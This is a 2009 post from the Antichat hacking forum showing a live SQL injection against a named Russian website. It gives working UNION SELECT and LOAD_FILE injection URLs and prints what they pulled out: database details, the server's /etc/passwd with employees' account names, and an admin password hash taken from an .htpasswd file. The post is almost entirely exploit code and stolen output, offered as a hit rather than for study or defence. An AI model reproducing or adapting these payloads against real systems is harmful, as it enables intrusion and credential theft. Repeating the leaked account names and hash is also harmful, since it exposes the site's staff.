HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 08.03.2009, 18:01
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
С нами: 9116712

Репутация: 688
По умолчанию

Код:
http://www.personal-s.ru/news/?action=news&do=view&object_id=-1+union+select+concat_ ws(0x3a,version (),database(),user()),2,3--
Database Version : 5.0.67
Database name : personal-s
User name : root@localhost


читаем /etc/passwd:

Код:
# $FreeBSD: src/etc/master.passwd,v 1.40
 2005/06/06 20:19:56 brooks Exp $ # root:*:0:0:Charlie
 &:/root:/bin/csh toor:*:0:0:Bourne-again
 Superuser:/root: daemon:*:1:1:Owner of many system
 processes:/root:/usr/sbin/nologin operator:*:2:5:System
 &:/:/usr/sbin/nologin bin:*:3:7:Binaries Commands and 
Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:
/usr/sbin/nologin kmem:*:5:65533:KMem Sandbox:/:
/usr/sbin/nologin games:*:7:13:Games pseudo-user:/usr
/games:/usr/sbin/nologin news:*:8:8:News Subsystem:/:
/usr/sbin/nologin man:*:9:9:Mister Man Pages:/usr/share
/man:/usr/sbin/nologin sshd:*:22:22:Secure Shell 
Daemon:/var/empty:/usr/sbin/nologin
 smmsp:*:25:25:Sendmail Submission User:/var/spool
/clientmqueue:/usr/sbin/nologin 
mailnull:*:26:26:Sendmail Default User:/var/spool
/mqueue:/usr/sbin/nologin bind:*:53:53:Bind Sandbox:/:
/usr/sbin/nologin proxy:*:62:62:Packet Filter pseudo-
user:/nonexistent:/usr/sbin/nologin 
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin
/nologin _dhcp:*:65:65:dhcp programs:/var/empty:
/usr/sbin/nologin uucp:*:66:66:UUCP pseudo-user:/var
/spool/uucppublic:/usr/local/libexec/uucp/uucico 
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin
/nologin www:*:80:80:World Wide Web 
Owner:/nonexistent:/usr/sbin/nologin 
nobody:*:65534:65534:Unprivileged user:/nonexistent:
/usr/sbin/nologin techsupport:*:100:100:Technical 
support group:/home/techsupport:/bin/sh 
squid:*:1001:1001:Squid proxy-caching web server's 
user:/nonexistent:/sbin/nologin clamav:*:106:106:Clam
 Antivirus:/nonexistent:/sbin/nologin
 spamd:*:58:58:SpamAssassin user:/var/spool/spamd:
/sbin/nologin v_kalinnikova:*:100:102:Email user:/home
/v_kalinnikova:/sbin/nologin office:*:101:102:Email 
user:/home/office:/sbin/nologin 
i_androsova:*:102:102:Email user:/home/i_androsova:
/sbin/nologin n_blagodatskaya:*:103:102:Email
 user:/home/n_blagodatskaya:/sbin/nologin 
i_gorlova:*:104:102:Email user:/home/i_gorlova:
/sbin/nologin p_reberka:*:105:102:Email user:/home
/p_reberka:/sbin/nologin 
y_mitrophanova:*:106:102:Email user:/home
/y_mitrophanova:/sbin/nologin bnv:*:107:102:Email
 user:/home/bnv:/sbin/nologin rpv:*:108:102:Email 
user:/home/rpv:/sbin/nologin 
k_tishenina:*:109:102:Email user:/home/k_tishenina:
/sbin/nologin oas:*:110:102:Email user:/home/hpa:/sbin
/nologin mysql:*:88:88:MySQL Daemon:/nonexistent:
/sbin/nologin backup:*:111:101:BackUp user:/var/Samba
/BackUp:/sbin/nologin a_markova:*:112:102:Email 
user:/home/a_markova:/sbin/nologin 
a_morokova:*:113:102:Email user:/home/a_morokova:
/sbin/nologin kmv:*:114:102:Email user:/home/omv:/sbin
/nologin ask:*:115:102:Email user:/home/ask:/sbin
/nologin bilenko:*:116:102:Email user:/home/ask:/sbin
/nologin e_kruglova:*:117:102:Email user:/home
/e_kruglova:/sbin/nologin gmp:*:118:102:Email 
user:/home/gmp:/sbin/nologin mea:*:118:102:Email 
user:/home/mea:/sbin/nologin konkurs:*:118:102:Email 
user:/home/konkurs:/sbin/nologin 
mailrobot:*:119:102:Email user:/home/mailrobot:
/sbin/nologin
оййй на чтой-то мы тут наткнулись :

Код:
http://www.personal-s.ru/news/?action=news&do=view&object_id=-1+union+select+LOAD_ FILE(0x2f686f6d652f74656368737570706f72742f2e6874706173737764), 2,3--
Код:
admin:NriRkf2e6iPFA
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.